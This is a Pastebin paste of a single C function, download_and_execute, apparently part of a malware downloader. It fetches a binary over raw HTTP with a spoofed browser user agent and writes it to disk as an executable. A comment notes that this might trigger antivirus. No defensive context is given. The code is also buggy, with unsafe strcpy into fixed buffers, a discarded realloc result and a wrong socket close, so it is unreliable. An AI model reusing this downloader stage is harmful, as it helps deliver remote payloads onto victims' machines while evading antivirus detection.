Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Downloads and execute a given binary file from a given url
- int download_and_execute(const char * path_to_write, const char * url, long filesize) {
- char host[512];
- char host_path[512];
- char* t = strstr(url, "://");
- strcpy(host, t + 3);
- char* tt = strstr(host, "/");
- if (!tt) return -1;
- else {
- strcpy(host_path, tt);
- }
- strcpy(tt, "\x00");
- #ifdef _DEBUG
- printf("HOST:%s\n", host);
- printf("PATH:%s\n", host_path);
- printf("Init...\n");
- #endif
- int __port = 80;
- printf("Phase-2\n");
- SOCKET host_server = INVALID_SOCKET;
- printf("phase-3\n");
- if (!socket_init_and_connect(&host_server, host, __port)) {
- printf("Error socket_init_and_connect\n");
- return -1;
- }
- printf("Phase-4\n");
- if (host_server == INVALID_SOCKET || host_server == NULL) {
- printf("Invalid socket..");
- return -1;
- }
- printf("Phase-5\n");
- // Form HTTP-request message.
- // use browser-like UA to have less complications
- char tmp_buff[512], http_request_buff[1024];
- sprintf(tmp_buff, "GET %s HTTP/1.0\r\n", host_path);
- strcpy(http_request_buff, tmp_buff);
- sprintf(tmp_buff, "HOST: %s\r\n", host);
- strcat(http_request_buff, tmp_buff);
- strcat(http_request_buff, "Cache-Control: max-age=0\r\n");
- strcat(http_request_buff, "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36\r\n" );
- strcat(http_request_buff, "\r\n");
- printf("HTTP-REQUEST-BUFF: \n%s\n", http_request_buff);
- if (!sendall(host_server, http_request_buff, strlen(http_request_buff) * sizeof(char))) {
- printf("Error sending request\n");
- close_socket_connection(host_server);
- return -1;
- }
- size_t http_response_size = (size_t)(filesize + 512);
- char * http_response = malloc(http_response_size);
- memset(http_response, 0, http_response_size);
- printf("Reading response");
- int total_recv = 0;
- while (1) {
- if (total_recv >= (int)(http_response_size) ) {
- printf("Reallocating\n");
- realloc(http_response, http_response_size + 64);
- http_response_size += 512;
- }
- int r = recv(host_server, http_response+total_recv, 1, 0);
- total_recv += r;
- memset(http_response + total_recv, 0, 1);
- if (r <= 0) {
- printf("Finished??..");
- break;
- }
- }
- printf("HTTP-REPONSE:\n%s\n", http_response);
- printf("Finished receiving...\n" );
- // http_response now holds the http response data by the server
- char* http_ok = strstr(http_response, "200 OK");
- if ((http_ok != NULL) && (http_response - http_ok) > 10) {
- free(http_response);
- close_socket_connection(host_server);
- return -1;
- }
- close_socket_connection("");
- char* http_header_end = strstr(http_response, "\r\n\r\n");
- if (http_header_end == NULL) {
- free(http_response);
- return -1;
- }
- char* exe_file_contents = http_header_end + 4;
- // [!] Direct write to disc of a (valid) PE file might trigger AVs
- FILE* file = fopen(path_to_write, "wb");
- if (!file) {
- return -1;
- }
- fwrite((void*)exe_file_contents, filesize, 1, file);
- fclose(file);
- return 1;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement